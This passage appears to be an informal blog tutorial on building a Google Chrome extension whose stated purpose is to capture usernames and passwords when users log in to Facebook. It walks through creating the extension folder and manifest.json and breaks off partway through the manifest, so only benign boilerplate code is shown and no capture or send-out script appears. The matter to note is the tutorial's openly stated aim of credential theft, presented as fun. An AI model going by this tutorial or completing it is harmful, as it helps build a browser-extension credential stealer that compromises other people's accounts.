Google Chorme Extension is so fun for discovering

Most of the people use google chrome today. So I want to show you how to create an Gooogle Chrome Extension to do something that you want. This extension is used to capture the username and password when users login on Facebook page So all what I get to do is below Step1: Create your own folder named your_extension Step2: create a file named manifest.json this file is used to describe all about your extension such as Name version description permission that your extension want to access like network, storage .... Background script: Scripts run in background Action page: html for display in your extension .... Icon: Icon of your extension ........ manifest.json { "manifest_version" : 2 , "name" : "My Cool Extension" , "version" : "0.1" , "description" : " Demo extension" , "permissions" : [ "activeTab" , "storag...